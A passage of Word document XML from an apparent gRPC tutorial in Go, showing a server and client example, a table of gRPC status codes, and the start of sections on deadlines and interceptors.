    <w:p w14:paraId="44D5D080" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AC89CD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F6C5E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D2564" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117065F7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004794B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="66ADED70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397ACE8F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    lis, _ := net.Listen("tcp", ":50051")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37531ADE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    grpcServer := grpc.NewServer()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A851A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    pb.RegisterOrderServiceServer(grpcServer, &amp;orderServer{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0210F0BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpcServer.Serve(lis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF068A3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EB1739" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client (Go):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E6C6AB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5060433F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18009969" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    conn, _ := grpc.Dial("order-service:50051", grpc.WithInsecure())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A1C98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    defer conn.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F7F00D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C0EDB9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    client := pb.NewOrderServiceClient(conn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6CCB98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECB4396" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Unary call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ECA243" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    order, err := client.GetOrder(context.Background(), &amp;pb.GetOrderRequest{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19DD34" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        OrderId: "order-789",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47C6D8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A413B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B959672" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Server streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B95F04" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    stream, _ := client.StreamOrderUpdates(context.Background(), &amp;pb.StreamRequest{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F00DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    for {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2150BAAF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        update, err := stream.Recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31169F58" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if err == io.EOF { break }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBCFA8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        fmt.Printf("Update: %v\n", update)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308A2DF5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4011E63F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BADB5A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 gRPC Status Codes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72"/>
        <w:gridCol w:w="2976"/>
        <w:gridCol w:w="4263"/>
      </w:tblGrid>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="0B4F867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7DC4B7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Code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F08316" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>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E1BE54" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0037017A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="66C76C5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E656EE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">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A197D2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>OK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49FEF9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="3788FA3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938C24" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>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73E857" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>CANCELLED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A53257" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Client cancelled the request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="0B68F0F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F2E153" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>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BAF77C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>UNKNOWN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B50AB8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Unknown error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="03F3B71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EFF496" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>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8710AF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>INVALID_ARGUMENT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97DC85" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Client sent invalid argument (like 400)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="43474AB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C34F29" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>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C0AA04" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>DEADLINE_EXCEEDED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47384A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Timeout (like 504)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="3A5FD3B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0B4F64" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">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F1662D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>NOT_FOUND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E9A4B0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Resource not found (like 404)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="2458D55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4932C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">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2CB67B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>ALREADY_EXISTS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617881" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Resource already exists (like 409)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="21C5009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FC3FD7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>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2A1CE2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>PERMISSION_DENIED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A2D4A8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>No permission (like 403)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="20DEA63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B51067" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">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430DF1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>RESOURCE_EXHAUSTED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7ABE2E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Rate limited (like 429)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="2AF2C85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9AFB46" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>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A672DE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>FAILED_PRECONDITION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91583B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>System not in required state (like 412)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="6D08CCF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FD9E6F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">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B3CB76" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>ABORTED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913E1D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Transaction aborted (conflict)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="6FAF396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AC88FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>11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0FF042" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>OUT_OF_RANGE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80DD1B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Operation out of valid range</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="18E4274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3B555B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>12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464B9D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>UNIMPLEMENTED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CFB1C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Method not implemented (like 501)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="0741ECF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C40F70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>13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90EF17" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>INTERNAL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31100F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Internal error (like 500)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="1509C33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2C6739" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>14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809E9E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>UNAVAILABLE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51F3FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Service unavailable (like 503)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0037017A" w:rsidRPr="0037017A" w14:paraId="55D6E80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9214EE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>16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39B80B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>UNAUTHENTICATED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563FB6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
            <w:r w:rsidRPr="0037017A">
              <w:t>Not authenticated (like 401)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3091511B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7 gRPC Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1417D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deadlines/Timeouts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499A3998" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA04640" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client sets deadline: "This call must complete within 5 seconds"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB3CA68" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B68EAB8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>defer cancel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33018743" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5CAED6E7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>order, err := client.GetOrder(ctx, &amp;pb.GetOrderRequest{OrderId: "789"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A773349" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>if status.Code(err) == codes.DeadlineExceeded {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F7496B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Handle timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC855CD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169081B3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="40CC7CFB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Deadline PROPAGATES across services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE37190" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client → Service A (3s remaining) → Service B (2s remaining) → Service C (1s remaining)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53888CFC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Each service knows how much time it has before the overall request times out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38957A23" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interceptors (middleware):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597B5B58" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C1582" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Server-side interceptor (like HTTP middleware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09821491" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">func loggingInterceptor(ctx context.Context, req interface{}, info *grpc.UnaryServerInfo, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5BA75C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    handler grpc.UnaryHandler) (interface{}, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D306676" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
